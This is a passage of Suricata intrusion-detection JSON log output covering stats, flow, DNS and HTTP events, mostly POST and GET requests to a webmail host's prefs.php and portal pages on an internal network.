memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1915,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2454,"failed_udp":116},"tx":{"http":4974,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2538}},"flow_mgr":{"closed_pruned":2874,"new_pruned":17,"est_pruned":2536,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10896,"memcap_state":0,"memcap_global":0},"http":{"memuse":57324,"memcap":0}}} {"timestamp":"2020-02-29T00:25:38.952006+0000","flow_id":407294692922328,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53140,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:25:39.452593+0000","flow_id":35694122887153,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36372,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2574,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:39.560672+0000","flow_id":35694122887153,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36372,"proto":"UDP","dns":{"type":"answer","id":2574,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:39.560672+0000","flow_id":35694122887153,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36372,"proto":"UDP","dns":{"type":"answer","id":2574,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:39.686533+0000","flow_id":681193347724086,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53146,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:25:39.701713+0000","flow_id":681193347724086,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53146,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413}} {"timestamp":"2020-02-29T00:25:40.001334+0000","flow_id":473329795826713,"event_type":"flow","src_ip":"192.168.10.122","src_port":54649,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:39.164889+0000","end":"2020-02-29T00:20:39.276286+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:42.000607+0000","flow_id":1649433575501601,"event_type":"flow","src_ip":"192.168.10.122","src_port":37012,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:41.470817+0000","end":"2020-02-29T00:20:41.579975+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:42.000814+0000","flow_id":1825376910826116,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"158.69.60.196","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:20:41.449156+0000","end":"2020-02-29T00:20:41.556671+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:44.702897+0000","flow_id":681193347724086,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53146,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:25:45.000180+0000","event_type":"stats","stats":{"uptime":15197,"capture":{"kernel_packets":141617,"kernel_drops":0},"decoder":{"pkts":141630,"bytes":97266988,"invalid":195,"ipv4":140041,"ipv6":10,"ethernet":141630,"raw":0,"null":0,"sll":0,"tcp":134463,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091584},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2908,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2924,"synack":2915,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2874,"new_pruned":17,"est_pruned":2539,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10565,"memcap_state":0,"memcap_global":0},"http":{"memuse":1440,"memcap":0}}} {"timestamp":"2020-02-29T00:25:48.000875+0000","flow_id":193285043724562,"event_type":"flow","src_ip":"192.168.10.122","src_port":49212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:47.794898+0000","end":"2020-02-29T00:20:47.903724+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:49.000616+0000","flow_id":934914226655249,"event_type":"flow","src_ip":"192.168.10.122","src_port":58554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:48.266257+0000","end":"2020-02-29T00:20:48.377643+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:52.000234+0000","event_type":"stats","stats":{"uptime":15204,"capture":{"kernel_packets":141630,"kernel_drops":0},"decoder":{"pkts":141633,"bytes":97267186,"invalid":195,"ipv4":140044,"ipv6":10,"ethernet":141633,"raw":0,"null":0,"sll":0,"tcp":134466,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091008},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2908,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2924,"synack":2915,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2874,"new_pruned":17,"est_pruned":2541,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":9903,"memcap_state":0,"memcap_global":0},"http":{"memuse":1440,"memcap":0}}} {"timestamp":"2020-02-29T00:25:54.000228+0000","flow_id":25411967806218,"event_type":"flow","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":39,"pkts_toclient":40,"bytes_toserver":3793,"bytes_toclient":50594,"start":"2020-02-29T00:24:48.420618+0000","end":"2020-02-29T00:24:53.581992+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000411+0000","flow_id":1027445017833512,"event_type":"flow","src_ip":"192.168.10.81","src_port":53118,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":751,"bytes_toclient":952,"start":"2020-02-29T00:24:48.421928+0000","end":"2020-02-29T00:24:53.434933+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000480+0000","flow_id":2058924363639521,"event_type":"flow","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":8,"bytes_toserver":1768,"bytes_toclient":4862,"start":"2020-02-29T00:24:48.420577+0000","end":"2020-02-29T00:24:53.435236+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000543+0000","flow_id":2226118850538449,"event_type":"flow","src_ip":"192.168.10.81","src_port":53114,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":6,"bytes_toserver":813,"bytes_toclient":2976,"start":"2020-02-29T00:24:48.420817+0000","end":"2020-02-29T00:24:53.435205+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000636+0000","flow_id":404301097748814,"event_type":"flow","src_ip":"192.168.10.81","src_port":53108,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":15,"bytes_toserver":1678,"bytes_toclient":13190,"start":"2020-02-29T00:24:48.280910+0000","end":"2020-02-29T00:24:53.435437+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000693+0000","flow_id":1391374776691898,"event_type":"flow","src_ip":"192.168.10.81","src_port":53116,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":6,"bytes_toserver":813,"bytes_toclient":1857,"start":"2020-02-29T00:24:48.421050+0000","end":"2020-02-29T00:24:53.434966+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:56.000823+0000","flow_id":1792692210569469,"event_type":"flow","src_ip":"192.168.10.122","src_port":45056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:55.135421+0000","end":"2020-02-29T00:20:55.246785+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:59.000150+0000","event_type":"stats","stats":{"uptime":15211,"capture":{"kernel_packets":141630,"kernel_drops":0},"decoder":{"pkts":141633,"bytes":97267186,"invalid":195,"ipv4":140044,"ipv6":10,"ethernet":141633,"raw":0,"null":0,"sll":0,"tcp":134466,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2908,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2924,"synack":2915,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2880,"new_pruned":17,"est_pruned":2542,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":960,"memcap":0}}} {"timestamp":"2020-02-29T00:26:03.000231+0000","flow_id":574029615970907,"event_type":"flow","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":17,"bytes_toserver":4066,"bytes_toclient":14425,"start":"2020-02-29T00:24:57.178779+0000","end":"2020-02-29T00:25:02.400737+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:03.000608+0000","flow_id":327567212657976,"event_type":"flow","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":8,"bytes_toserver":1796,"bytes_toclient":3211,"start":"2020-02-29T00:24:57.179512+0000","end":"2020-02-29T00:25:02.203210+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:03.000787+0000","flow_id":105264000271271,"event_type":"flow","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":20,"bytes_toserver":3073,"bytes_toclient":17407,"start":"2020-02-29T00:24:56.197543+0000","end":"2020-02-29T00:25:02.207159+0000","age":6,"state":"closed","reason":"timeout","alerted":true},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:03.000947+0000","flow_id":1255271558660282,"event_type":"flow","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":2418,"bytes_toclient":6796,"start":"2020-02-29T00:24:57.180410+0000","end":"2020-02-29T00:25:02.203347+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:03.001092+0000","flow_id":1124614358556355,"event_type":"flow","src_ip":"192.168.10.81","src_port":53130,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":6,"bytes_toserver":825,"bytes_toclient":3037,"start":"2020-02-29T00:24:57.188099+0000","end":"2020-02-29T00:25:02.196186+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:06.000214+0000","event_type":"stats","stats":{"uptime":15218,"capture":{"kernel_packets":141634,"kernel_drops":0},"decoder":{"pkts":141724,"bytes":97351162,"invalid":195,"ipv4":140135,"ipv6":10,"ethernet":141724,"raw":0,"null":0,"sll":0,"tcp":134557,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10005,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087840},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2909,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2925,"synack":2916,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2885,"new_pruned":17,"est_pruned":2542,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":0,"flows_timeout":5,"flows_timeout_inuse":0,"flows_removed":5,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:26:13.000168+0000","event_type":"stats","stats":{"uptime":15225,"capture":{"kernel_packets":141728,"kernel_drops":0},"decoder":{"pkts":141732,"bytes":97351680,"invalid":195,"ipv4":140141,"ipv6":10,"ethernet":141732,"raw":0,"null":0,"sll":0,"tcp":134563,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087840},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2909,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2925,"synack":2916,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2885,"new_pruned":17,"est_pruned":2542,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:26:13.000748+0000","flow_id":291270444040479,"event_type":"flow","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":46,"pkts_toclient":48,"bytes_toserver":11808,"bytes_toclient":42234,"start":"2020-02-29T00:24:57.180511+0000","end":"2020-02-29T00:25:12.186174+0000","age":15,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:13.000894+0000","flow_id":1751078273571388,"event_type":"flow","src_ip":"192.168.10.122","src_port":33195,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:12.088636+0000","end":"2020-02-29T00:21:12.197781+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:13.001057+0000","flow_id":503484763396705,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"162.159.200.123","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:21:12.449121+0000","end":"2020-02-29T00:21:12.451002+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:14.850575+0000","flow_id":563953627757199,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14644,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:14.959074+0000","flow_id":563953627757199,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52162,"proto":"UDP","dns":{"type":"answer","id":14644,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:14.959074+0000","flow_id":563953627757199,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52162,"proto":"UDP","dns":{"type":"answer","id":14644,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:15.000259+0000","flow_id":1436373150435366,"event_type":"flow","src_ip":"192.168.10.130","src_port":34294,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":16,"pkts_toclient":19,"bytes_toserver":3992,"bytes_toclient":16373,"start":"2020-02-29T00:25:09.690214+0000","end":"2020-02-29T00:25:14.727805+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:15.158192+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090}} {"timestamp":"2020-02-29T00:26:16.000361+0000","flow_id":1992601480049501,"event_type":"flow","src_ip":"192.168.10.130","src_port":34298,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":2028,"bytes_toclient":3463,"start":"2020-02-29T00:25:09.701277+0000","end":"2020-02-29T00:25:14.750566+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:18.001230+0000","flow_id":235487409740482,"event_type":"flow","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1954,"bytes_toclient":6225,"start":"2020-02-29T00:25:12.465602+0000","end":"2020-02-29T00:25:17.888501+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:18.001636+0000","flow_id":1098183115353279,"event_type":"flow","src_ip":"192.168.10.122","src_port":57780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:17.208063+0000","end":"2020-02-29T00:21:17.319419+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 